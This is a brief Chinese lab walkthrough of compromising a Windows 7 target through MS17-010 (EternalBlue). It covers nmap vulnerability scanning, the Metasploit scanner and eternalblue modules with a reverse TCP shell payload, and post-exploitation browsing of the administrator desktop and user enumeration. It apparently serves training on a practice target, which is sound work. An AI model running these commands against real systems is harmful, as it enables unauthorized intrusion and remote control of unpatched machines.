1、对Win7进行信息收集
使用nmap对win7进行漏洞扫描
nmap --script=vuln IP地址
确实存在ms17-010漏洞
2、打开metasploit
msfdb run会自动开启postgresql数据库
msfdb run
利用search命令查找与ms17-010相关的模块
首先使用第1条对靶机进行扫描
use auxiliary/scanner/smb/smb_ms17_010
set rhost ip
run
再次确定了这里确实存在该漏洞
再使用第二条对靶机进行渗透
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set rhost ip
run
已经夺得shell权限
cd c:\users\administrator\desktop
dir
发现存在乱码,我们更改一下编码
chcp 65001
这里我们发现乱码已经消失
发现桌面上存在以上文件夹
net user
查看存在哪些用户